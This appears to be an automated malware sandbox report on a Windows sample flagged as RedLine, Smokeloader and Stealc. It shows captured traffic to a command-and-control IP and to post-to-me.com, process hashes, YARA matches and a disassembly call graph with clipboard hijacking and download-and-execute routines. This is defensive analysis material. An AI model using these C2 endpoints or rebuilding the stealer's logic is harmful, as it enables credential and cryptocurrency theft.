                                                Oct 26, 2024 08:56:08.479460955 CEST36INData Raw: 00 5e 5d c3 8b ff 55 8b ec 8b 0d 60 c0 b3 02 a1 64 c0 b3 02 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00
                                                Data Ascii: ^]U`dkU+P
                                                Oct 26, 2024 08:56:08.479495049 CEST1236INData Raw: 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b cf 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f0 8b 0e 49 89 4d fc f6 c1 01 0f 85 d3 02 00 00 53 8d 1c
                                                Data Ascii: r;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]
                                                Oct 26, 2024 08:56:08.479531050 CEST1236INData Raw: 21 50 08 8b c3 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56 8b 75 10 57 8b 7d 0c 8b d7 2b 51 0c 83 c6 17 c1 ea 0f 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4f fc 83 e6 f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d
                                                Data Ascii: !P_^[UMASVuW}+QiDMOI;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}
                                                Oct 26, 2024 08:56:08.485047102 CEST1236INData Raw: 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08 0f 84 8d 00 00 00 8b 4d f4 8d 0c f1 8b 79 04 89 4a 08 89 7a 04 89 51 04 8b 4a 04 89 51 08 8b 4a 04 3b 4a 08 75 5e 8a 4c 06 04 88 4d 0b fe c1
                                                Data Ascii: ]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuNL2uy>u;@CuM;tu%@CM


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54970662.204.41.177805576C:\Users\user\AppData\Local\Temp\64A.tmp.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 26, 2024 08:56:16.153630972 CEST88OUTGET / HTTP/1.1
                                                Host: 62.204.41.177
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 26, 2024 08:56:17.037724972 CEST203INHTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:16 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 0
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Oct 26, 2024 08:56:17.041209936 CEST418OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBG
                                                Host: 62.204.41.177
                                                Content-Length: 218
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 42 45 43 44 45 31 32 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a
                                                Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"0EFBECDE1239786254513------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default9_cap------ECGDHDHJEBGHJKFIECBG--
                                                Oct 26, 2024 08:56:18.476349115 CEST210INHTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:17 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 8
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                Data Ascii: YmxvY2s=


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704104.21.56.704434672C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-26 06:56:06 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                User-Agent: ShareScreen
                                                Host: post-to-me.com
                                                2024-10-26 06:56:07 UTC778INHTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5oQOIcvye9ej8UbhqAMUqoJN3KnFm9ZMI2VnaVAMDGAwecwPIXLZ0zREyNkJXiO4txr9rirpAYxj%2FrUbA%2Bx6uWL9LfMMcAdyTasnhLaq95UY3hoZaae%2FXirRdAtt%2BvtOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8d888b6c0909e7ff-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1901&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=728&delivery_rate=1553648&cwnd=251&unsent_bytes=0&cid=ce5d352a6f374130&ts=1332&x=0"
                                                2024-10-26 06:56:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                Data Ascii: 2ok
                                                2024-10-26 06:56:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:02:56:01
                                                Start date:26/10/2024
                                                Path:C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\mCe4hBfqCT.exe"
                                                Imagebase:0x400000
                                                File size:430'592 bytes
                                                MD5 hash:5B01B239F2B48841380E3665D1C3F98A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:2
                                                Start time:02:56:10
                                                Start date:26/10/2024
                                                Path:C:\Users\user\AppData\Local\Temp\64A.tmp.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\64A.tmp.exe"
                                                Imagebase:0x400000
                                                File size:352'256 bytes
                                                MD5 hash:676EE4608A4ABD53EBDD6B380C2A3817
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 45%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:02:56:18
                                                Start date:26/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044
                                                Imagebase:0x260000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.4%
                                                  Dynamic/Decrypted Code Coverage:4.4%
                                                  Signature Coverage:6.7%
                                                  Total number of Nodes:638
                                                  Total number of Limit Nodes:20
                                                  execution_graph 65091 404bb3 65092 404bbf Concurrency::details::SchedulerProxy::DestroyExecutionResource 65091->65092 65097 40fb31 65092->65097 65096 404bdf Concurrency::details::SchedulerProxy::DestroyExecutionResource 65100 40fb36 65097->65100 65099 404bc8 65105 4051f5 65099->65105 65100->65099 65102 40fb52 Concurrency::details::FairScheduleGroup::AllocateSegment 65100->65102 65121 42ad9e 65100->65121 65128 42f470 7 API calls 2 library calls 65100->65128 65129 42862d RaiseException 65102->65129 65104 4103ec 65106 405201 Concurrency::details::SchedulerProxy::DestroyExecutionResource __Cnd_init 65105->65106 65109 405219 __Mtx_init 65106->65109 65140 40ce57 28 API calls std::_Throw_Cpp_error 65106->65140 65108 405240 65132 4010ea 65108->65132 65109->65108 65141 40ce57 28 API calls std::_Throw_Cpp_error 65109->65141 65115 40528f 65116 4052a4 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65115->65116 65143 401128 30 API calls 2 library calls 65115->65143 65144 401109 65116->65144 65120 4052c9 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65120->65096 65126 4336c7 __dosmaperr 65121->65126 65122 433705 65131 42eae9 20 API calls __dosmaperr 65122->65131 65124 4336f0 RtlAllocateHeap 65125 433703 65124->65125 65124->65126 65125->65100 65126->65122 65126->65124 65130 42f470 7 API calls 2 library calls 65126->65130 65128->65100 65129->65104 65130->65126 65131->65125 65148 40d338 65132->65148 65135 401103 65137 40cf18 65135->65137 65180 42e134 65137->65180 65140->65109 65141->65108 65142 40ce57 28 API calls std::_Throw_Cpp_error 65142->65115 65143->65115 65145 401115 __Mtx_unlock 65144->65145 65146 401122 65145->65146 65512 40ce57 28 API calls std::_Throw_Cpp_error 65145->65512 65146->65120 65152 40d092 65148->65152 65151 40ce57 28 API calls std::_Throw_Cpp_error 65151->65135 65153 40d0e8 65152->65153 65154 40d0ba GetCurrentThreadId 65152->65154 65157 40d112 65153->65157 65158 40d0ec GetCurrentThreadId 65153->65158 65155 40d0e0 65154->65155 65156 40d0c5 GetCurrentThreadId 65154->65156 65170 40f8f4 65155->65170 65156->65155 65159 40d1ab GetCurrentThreadId 65157->65159 65161 40d132 65157->65161 65166 40d0fb 65158->65166 65159->65166 65160 40d202 GetCurrentThreadId 65160->65155 65177 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65161->65177 65165 4010f6 65165->65135 65165->65151 65166->65155 65166->65160 65167 40d16a GetCurrentThreadId 65167->65166 65168 40d13d __Xtime_diff_to_millis2 65167->65168 65168->65155 65168->65166 65168->65167 65178 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65168->65178 65171 40f8fd 65170->65171 65172 40f8ff IsProcessorFeaturePresent 65170->65172 65171->65165 65174 40f972 65172->65174 65179 40f936 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65174->65179 65176 40fa55 65176->65165 65177->65168 65178->65168 65179->65176 65181 42e141 65180->65181 65182 42e155 65180->65182 65203 42eae9 20 API calls __dosmaperr 65181->65203 65194 42e0eb 65182->65194 65185 42e146 65204 42a5bd 26 API calls _Deallocate 65185->65204 65188 42e16a CreateThread 65190 42e195 65188->65190 65191 42e189 GetLastError 65188->65191 65232 42dfe0 65188->65232 65189 40527c 65189->65115 65189->65142 65206 42e05d 65190->65206 65205 42eab3 20 API calls __dosmaperr 65191->65205 65214 434d4a 65194->65214 65198 42e104 65199 42e123 65198->65199 65200 42e10b GetModuleHandleExW 65198->65200 65201 42e05d __Thrd_start 22 API calls 65199->65201 65200->65199 65202 42e12d 65201->65202 65202->65188 65202->65190 65203->65185 65204->65189 65205->65190 65207 42e06a 65206->65207 65208 42e08e 65206->65208 65209 42e070 CloseHandle 65207->65209 65210 42e079 65207->65210 65208->65189 65209->65210 65211 42e088 65210->65211 65212 42e07f FreeLibrary 65210->65212 65213 43348a _free 20 API calls 65211->65213 65212->65211 65213->65208 65215 434d57 65214->65215 65216 434d82 HeapAlloc 65215->65216 65217 434d6b __dosmaperr 65215->65217 65218 434d97 65215->65218 65216->65217 65219 434d95 65216->65219 65217->65216 65217->65218 65229 42f470 7 API calls 2 library calls 65217->65229 65230 42eae9 20 API calls __dosmaperr 65218->65230 65221 42e0fb 65219->65221 65223 43348a 65221->65223 65224 433495 HeapFree 65223->65224 65228 4334be __dosmaperr 65223->65228 65225 4334aa 65224->65225 65224->65228 65231 42eae9 20 API calls __dosmaperr 65225->65231 65227 4334b0 GetLastError 65227->65228 65228->65198 65229->65217 65230->65221 65231->65227 65233 42dfec _Atexit 65232->65233 65234 42dff3 GetLastError ExitThread 65233->65234 65235 42e000 65233->65235 65248 431efa GetLastError 65235->65248 65237 42e005 65268 435591 65237->65268 65240 42e01b 65275 401169 65240->65275 65249 431f10 65248->65249 65250 431f16 65248->65250 65283 435131 11 API calls 2 library calls 65249->65283 65251 434d4a __dosmaperr 20 API calls 65250->65251 65254 431f65 SetLastError 65250->65254 65253 431f28 65251->65253 65259 431f30 65253->65259 65284 435187 11 API calls 2 library calls 65253->65284 65254->65237 65256 43348a _free 20 API calls 65258 431f36 65256->65258 65257 431f45 65257->65259 65260 431f4c 65257->65260 65261 431f71 SetLastError 65258->65261 65259->65256 65285 431d6c 20 API calls __dosmaperr 65260->65285 65286 42df9d 167 API calls 2 library calls 65261->65286 65264 431f57 65266 43348a _free 20 API calls 65264->65266 65265 431f7d 65267 431f5e 65266->65267 65267->65254 65267->65261 65269 4355b6 65268->65269 65270 4355ac 65268->65270 65287 434eb3 5 API calls 2 library calls 65269->65287 65272 40f8f4 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 65270->65272 65273 42e010 65272->65273 65273->65240 65282 4354c4 10 API calls 2 library calls 65273->65282 65274 4355cd 65274->65270 65288 405825 65275->65288 65301 40155a Sleep 65275->65301 65276 401173 65279 42e1b9 65276->65279 65480 42e094 65279->65480 65281 42e1c6 65282->65240 65283->65250 65284->65257 65285->65264 65286->65265 65287->65274 65289 405831 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65288->65289 65290 4010ea std::_Cnd_initX 35 API calls 65289->65290 65291 405846 __Cnd_signal 65290->65291 65292 40585e 65291->65292 65347 40ce57 28 API calls std::_Throw_Cpp_error 65291->65347 65294 401109 std::_Cnd_initX 28 API calls 65292->65294 65295 405867 65294->65295 65303 4016e3 65295->65303 65324 402a14 InternetOpenW 65295->65324 65298 40586e Concurrency::details::SchedulerProxy::DestroyExecutionResource 65298->65276 65302 4016d9 65301->65302 65348 40fe0b 65303->65348 65305 4016ef Sleep 65349 40cc35 65305->65349 65308 40cc35 28 API calls 65309 401715 65308->65309 65310 40171f OpenClipboard 65309->65310 65311 401947 Sleep 65310->65311 65312 40172f GetClipboardData 65310->65312 65311->65310 65313 401941 CloseClipboard 65312->65313 65314 40173f GlobalLock 65312->65314 65313->65311 65314->65313 65316 40174c _strlen 65314->65316 65315 40cbec 28 API calls std::system_error::system_error 65315->65316 65316->65313 65316->65315 65317 40cc35 28 API calls 65316->65317 65319 4018d6 EmptyClipboard GlobalAlloc 65316->65319 65353 402e8b 167 API calls 2 library calls 65316->65353 65355 40cacb 26 API calls _Deallocate 65316->65355 65317->65316 65319->65316 65320 4018ef GlobalLock 65319->65320 65354 4269b0 65320->65354 65323 401909 GlobalUnlock SetClipboardData GlobalFree 65323->65316 65325 402a47 InternetOpenUrlW 65324->65325 65326 402bbc 65324->65326 65325->65326 65327 402a5d GetTempPathW GetTempFileNameW 65325->65327 65329 40f8f4 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 65326->65329 65361 42a8ae 65327->65361 65331 402bcb 65329->65331 65340 40e790 65331->65340 65332 402bab InternetCloseHandle InternetCloseHandle 65332->65326 65333 402ac8 ListArray 65334 402ae0 InternetReadFile WriteFile 65333->65334 65335 402b20 CloseHandle 65333->65335 65334->65333 65363 402980 65335->65363 65338 402b4b ShellExecuteExW 65338->65332 65339 402b92 WaitForSingleObject CloseHandle 65338->65339 65339->65332 65471 40df0f 65340->65471 65345 40e835 65345->65298 65346 40e7a7 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65478 40df1b LeaveCriticalSection std::_Lockit::~_Lockit 65346->65478 65347->65292 65348->65305 65350 40cc51 _strlen 65349->65350 65356 40cbec 65350->65356 65352 401708 65352->65308 65353->65316 65354->65323 65355->65316 65357 40cc1f 65356->65357 65359 40cbfb BuildCatchObjectHelperInternal 65356->65359 65360 40cb81 28 API calls 4 library calls 65357->65360 65359->65352 65360->65359 65362 402a96 CreateFileW 65361->65362 65362->65332 65362->65333 65364 4029ab ListArray _wcslen 65363->65364 65373 42b474 65364->65373 65368 4029d8 65395 404358 65368->65395 65371 40f8f4 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 65372 402a12 65371->65372 65372->65332 65372->65338 65399 42b126 65373->65399 65376 402843 65377 402852 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65376->65377 65425 403302 65377->65425 65379 402866 65441 403bb0 65379->65441 65381 40287a 65382 4028a8 65381->65382 65383 40288c 65381->65383 65447 403137 65382->65447 65468 4032bf 167 API calls 65383->65468 65386 4028b5 65450 403c45 65386->65450 65388 4028c7 65460 403ce7 65388->65460 65390 4028e4 65391 404358 26 API calls 65390->65391 65393 402903 65391->65393 65392 40289f std::ios_base::_Ios_base_dtor Concurrency::details::SchedulerProxy::DestroyExecutionResource 65392->65368 65469 4032bf 167 API calls 65393->65469 65396 404360 65395->65396 65397 402a04 65395->65397 65470 40ccbb 26 API calls 2 library calls 65396->65470 65397->65371 65400 42b153 65399->65400 65401 42b157 65400->65401 65402 42b162 65400->65402 65403 42b17a 65400->65403 65406 40f8f4 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 65401->65406 65404 42eae9 __dosmaperr 20 API calls 65402->65404 65405 42a767 __fassign 162 API calls 65403->65405 65407 42b167 65404->65407 65408 42b185 65405->65408 65409 4029c4 65406->65409 65410 42a5bd _Atexit 26 API calls 65407->65410 65411 42b190 65408->65411 65412 42b327 65408->65412 65409->65376 65410->65401 65414 42b238 WideCharToMultiByte 65411->65414 65417 42b19b 65411->65417 65422 42b1d5 WideCharToMultiByte 65411->65422 65413 42b354 WideCharToMultiByte 65412->65413 65415 42b332 65412->65415 65413->65415 65414->65417 65418 42b263 65414->65418 65415->65401 65419 42eae9 __dosmaperr 20 API calls 65415->65419 65417->65401 65421 42eae9 __dosmaperr 20 API calls 65417->65421 65418->65417 65420 42b26c GetLastError 65418->65420 65419->65401 65420->65417 65424 42b27b 65420->65424 65421->65401 65422->65417 65423 42b294 WideCharToMultiByte 65423->65415 65423->65424 65424->65401 65424->65415 65424->65423 65426 40330e Concurrency::details::SchedulerProxy::DestroyExecutionResource 65425->65426 65427 4046a1 167 API calls 65426->65427 65428 40333a 65427->65428 65429 404872 167 API calls 65428->65429 65430 403363 65429->65430 65431 4045b1 26 API calls 65430->65431 65432 403372 65431->65432 65433 4033b7 std::ios_base::_Ios_base_dtor 65432->65433 65434 40de08 167 API calls 65432->65434 65435 4033f3 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65433->65435 65437 40c63d 167 API calls 65433->65437 65436 403387 65434->65436 65435->65379 65436->65433 65438 4045b1 26 API calls 65436->65438 65437->65435 65439 403398 65438->65439 65440 404c39 167 API calls 65439->65440 65440->65433 65442 403bbc Concurrency::details::SchedulerProxy::DestroyExecutionResource 65441->65442 65443 4042d4 167 API calls 65442->65443 65444 403bc8 65443->65444 65445 403bec Concurrency::details::SchedulerProxy::DestroyExecutionResource 65444->65445 65446 403520 167 API calls 65444->65446 65445->65381 65446->65445 65448 40437b 28 API calls 65447->65448 65449 403151 ListArray 65448->65449 65449->65386 65451 403c51 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65450->65451 65452 40c63d 167 API calls 65451->65452 65453 403c74 65452->65453 65454 4042d4 167 API calls 65453->65454 65455 403c7e 65454->65455 65456 403cc1 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65455->65456 65459 403520 167 API calls 65455->65459 65456->65388 65457 403c9f 65457->65456 65458 4046ef 167 API calls 65457->65458 65458->65456 65459->65457 65461 403cf3 __EH_prolog3_catch 65460->65461 65462 4042d4 167 API calls 65461->65462 65463 403d0c 65462->65463 65464 403d3c 65463->65464 65467 4036c4 40 API calls 65463->65467 65465 4046ef 167 API calls 65464->65465 65466 403d95 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65465->65466 65466->65390 65467->65464 65468->65392 65469->65392 65470->65397 65479 40f24f EnterCriticalSection 65471->65479 65473 40df19 65474 40cebe GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65473->65474 65475 40cef7 65474->65475 65476 40ceec CloseHandle 65474->65476 65477 40cefb GetCurrentThreadId 65475->65477 65476->65477 65477->65346 65478->65345 65479->65473 65489 431f7e GetLastError 65480->65489 65482 42e0a3 ExitThread 65485 42e0c1 65486 42e0d4 65485->65486 65487 42e0cd CloseHandle 65485->65487 65486->65482 65488 42e0e0 FreeLibraryAndExitThread 65486->65488 65487->65486 65490 431f9d 65489->65490 65491 431f97 65489->65491 65493 434d4a __dosmaperr 17 API calls 65490->65493 65494 431ff4 SetLastError 65490->65494 65509 435131 11 API calls 2 library calls 65491->65509 65495 431faf 65493->65495 65498 42e09f 65494->65498 65496 431fb7 65495->65496 65510 435187 11 API calls 2 library calls 65495->65510 65500 43348a _free 17 API calls 65496->65500 65498->65482 65498->65485 65508 435516 10 API calls 2 library calls 65498->65508 65499 431fcc 65499->65496 65502 431fd3 65499->65502 65501 431fbd 65500->65501 65503 431feb SetLastError 65501->65503 65511 431d6c 20 API calls __dosmaperr 65502->65511 65503->65498 65505 431fde 65506 43348a _free 17 API calls 65505->65506 65507 431fe4 65506->65507 65507->65494 65507->65503 65508->65485 65509->65490 65510->65499 65511->65505 65512->65146 65513 402c24 InternetOpenW 65514 402e7a 65513->65514 65517 402c57 ListArray 65513->65517 65515 40f8f4 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 65514->65515 65516 402e89 65515->65516 65525 42df1d 65517->65525 65520 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 65521 402e3c 65520->65521 65522 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 65521->65522 65523 402e4e InternetOpenUrlW 65522->65523 65523->65514 65524 402e69 InternetCloseHandle InternetCloseHandle 65523->65524 65524->65514 65527 42df2c 65525->65527 65528 42df3a 65525->65528 65527->65528 65532 42df6a 65527->65532 65534 42eae9 20 API calls __dosmaperr 65528->65534 65529 42df44 65535 42a5bd 26 API calls _Deallocate 65529->65535 65531 402e2e 65531->65520 65532->65531 65536 42eae9 20 API calls __dosmaperr 65532->65536 65534->65529 65535->65531 65536->65529 65537 4327a5 65542 432573 65537->65542 65540 4327cd 65547 43259e 65542->65547 65544 432791 65561 42a5bd 26 API calls _Deallocate 65544->65561 65546 4326f0 65546->65540 65554 43d03c 65546->65554 65550 4326e7 65547->65550 65557 43c8ee 170 API calls 2 library calls 65547->65557 65549 432731 65549->65550 65558 43c8ee 170 API calls 2 library calls 65549->65558 65550->65546 65560 42eae9 20 API calls __dosmaperr 65550->65560 65552 432750 65552->65550 65559 43c8ee 170 API calls 2 library calls 65552->65559 65562 43ca11 65554->65562 65556 43d057 65556->65540 65557->65549 65558->65552 65559->65550 65560->65544 65561->65546 65564 43ca1d BuildCatchObjectHelperInternal 65562->65564 65563 43ca2b 65580 42eae9 20 API calls __dosmaperr 65563->65580 65564->65563 65566 43ca64 65564->65566 65573 43cfeb 65566->65573 65567 43ca30 65581 42a5bd 26 API calls _Deallocate 65567->65581 65572 43ca3a __fread_nolock 65572->65556 65583 43f961 65573->65583 65576 43ca88 65582 43cab1 LeaveCriticalSection __wsopen_s 65576->65582 65579 43348a _free 20 API calls 65579->65576 65580->65567 65581->65572 65582->65572 65584 43f984 65583->65584 65585 43f96d 65583->65585 65587 43f9a3 65584->65587 65588 43f98c 65584->65588 65654 42eae9 20 API calls __dosmaperr 65585->65654 65658 434fca 10 API calls 2 library calls 65587->65658 65656 42eae9 20 API calls __dosmaperr 65588->65656 65589 43f972 65655 42a5bd 26 API calls _Deallocate 65589->65655 65593 43f991 65657 42a5bd 26 API calls _Deallocate 65593->65657 65594 43f9aa MultiByteToWideChar 65596 43f9d9 65594->65596 65597 43f9c9 GetLastError 65594->65597 65660 4336c7 21 API calls 2 library calls 65596->65660 65659 42eab3 20 API calls __dosmaperr 65597->65659 65600 43d001 65600->65576 65607 43d05c 65600->65607 65601 43f9e1 65602 43fa09 65601->65602 65603 43f9e8 MultiByteToWideChar 65601->65603 65605 43348a _free 20 API calls 65602->65605 65603->65602 65604 43f9fd GetLastError 65603->65604 65661 42eab3 20 API calls __dosmaperr 65604->65661 65605->65600 65662 43cdbf 65607->65662 65610 43d0a7 65680 43979e 65610->65680 65611 43d08e 65694 42ead6 20 API calls __dosmaperr 65611->65694 65614 43d0ac 65615 43d0b5 65614->65615 65616 43d0cc 65614->65616 65696 42ead6 20 API calls __dosmaperr 65615->65696 65693 43cd2a CreateFileW 65616->65693 65620 43d0ba 65697 42eae9 20 API calls __dosmaperr 65620->65697 65621 43d029 65621->65579 65623 43d182 GetFileType 65624 43d1d4 65623->65624 65625 43d18d GetLastError 65623->65625 65702 4396e7 21 API calls 2 library calls 65624->65702 65700 42eab3 20 API calls __dosmaperr 65625->65700 65626 43d093 65695 42eae9 20 API calls __dosmaperr 65626->65695 65627 43d157 GetLastError 65699 42eab3 20 API calls __dosmaperr 65627->65699 65630 43d105 65630->65623 65630->65627 65698 43cd2a CreateFileW 65630->65698 65631 43d19b CloseHandle 65631->65626 65633 43d1c4 65631->65633 65701 42eae9 20 API calls __dosmaperr 65633->65701 65635 43d14a 65635->65623 65635->65627 65637 43d1f5 65638 43d241 65637->65638 65703 43cf3b 169 API calls 3 library calls 65637->65703 65643 43d26e 65638->65643 65704 43cadd 167 API calls 4 library calls 65638->65704 65639 43d1c9 65639->65626 65642 43d267 65642->65643 65644 43d27f 65642->65644 65705 4335ed 29 API calls 2 library calls 65643->65705 65644->65621 65646 43d2fd CloseHandle 65644->65646 65706 43cd2a CreateFileW 65646->65706 65648 43d328 65649 43d332 GetLastError 65648->65649 65653 43d277 65648->65653 65707 42eab3 20 API calls __dosmaperr 65649->65707 65651 43d33e 65708 4398b0 21 API calls 2 library calls 65651->65708 65653->65621 65654->65589 65655->65600 65656->65593 65657->65600 65658->65594 65659->65600 65660->65601 65661->65602 65663 43cde0 65662->65663 65664 43cdfa 65662->65664 65663->65664 65716 42eae9 20 API calls __dosmaperr 65663->65716 65709 43cd4f 65664->65709 65667 43cdef 65717 42a5bd 26 API calls _Deallocate 65667->65717 65669 43ce32 65670 43ce61 65669->65670 65718 42eae9 20 API calls __dosmaperr 65669->65718 65677 43ceb4 65670->65677 65720 42ffff 26 API calls 2 library calls 65670->65720 65673 43ceaf 65675 43cf2e 65673->65675 65673->65677 65674 43ce56 65719 42a5bd 26 API calls _Deallocate 65674->65719 65721 42a5ea 11 API calls _Atexit 65675->65721 65677->65610 65677->65611 65679 43cf3a 65681 4397aa BuildCatchObjectHelperInternal 65680->65681 65724 42e40d EnterCriticalSection 65681->65724 65683 4397f8 65725 4398a7 65683->65725 65685 4397d6 65728 43957d 21 API calls 3 library calls 65685->65728 65686 4397b1 65686->65683 